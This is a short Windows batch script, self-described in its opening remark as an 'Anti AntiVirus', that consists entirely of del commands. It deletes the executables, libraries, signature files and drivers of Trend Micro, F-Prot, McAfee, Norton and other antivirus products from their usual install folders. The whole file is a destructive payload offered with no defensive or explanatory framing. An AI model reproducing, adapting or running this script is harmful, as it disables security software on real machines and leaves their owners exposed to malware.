Rem [Hey How About An Anti AntiVirus]
del c:\progra~1\trendp~1\*.exe
del c:\progra~1\trendp~1\*.dll
del c:\progra~1\trendp~1\*.dat
del c:\progra~1\trendp~1\*.vxd
del c:\trendp~1\*.exe
del c:\trendp~1\*.dll
del c:\trendp~1\*.dat
del c:\trendp~1\*.vxd
del c:\progra~1\f-prot\*.exe
del c:\progra~1\f-prot\*.dll
del c:\progra~1\f-prot\*.vxd
del c:\progra~1\f-prot\*.rep
del c:\f-prot\*.exe
del c:\f-prot\*.dll
del c:\f-prot\*.vxd
del c:\f-prot\*.rep
del c:\fsi\f-prot\*.exe
del c:\fsi\f-prot\*.dll
del c:\fsi\f-prot\*.vxd
del c:\fsi\f-prot\*.rep
del c:\progra~1\mcafee~1\*.dat 
del c:\progra~1\mcafee~1\*.dll 
del c:\progra~1\mcafee~1\*.exe 
del c:\progra~1\mcafee~1\*.vsc 
del c:\progra~1\mcafee\*.dat 
del c:\progra~1\mcafee\*.dll 
del c:\progra~1\mcafee\*.exe 
del c:\progra~1\mcafee\*.vsc 
del c:\mcafee~1\*.dat
del c:\mcafee~1\*.dll
del c:\mcafee~1\*.exe
del c:\mcafee~1\*.vsc
del c:\mcafee\*.dat
del c:\mcafee\*.dll
del c:\mcafee\*.exe
del c:\mcafee\*.vsc
del c:\progra~1\antiv~1\*.avc 
del c:\progra~1\antiv~1\*.set 
del c:\progra~1\antiv~1\*.dll 
del c:\progra~1\antiv~1\*.vxd 
del c:\progra~1\antiv~1\*.exe 
del c:\antiv~1\*.avc 
del c:\antiv~1\*.set 
del c:\antiv~1\*.dll 
del c:\antiv~1\*.vxd 
del c:\antiv~1\*.exe 
del c:\progra~1\norton~1\*.exe
del c:\progra~1\norton~1\*.dll
del c:\progra~1\norton~1\*.dat
del c:\progra~1\norton~1\*.vxd
del c:\norton~1\*.exe
del c:\norton~1\*.dll
del c:\norton~1\*.dat
del c:\norton~1\*.vxd

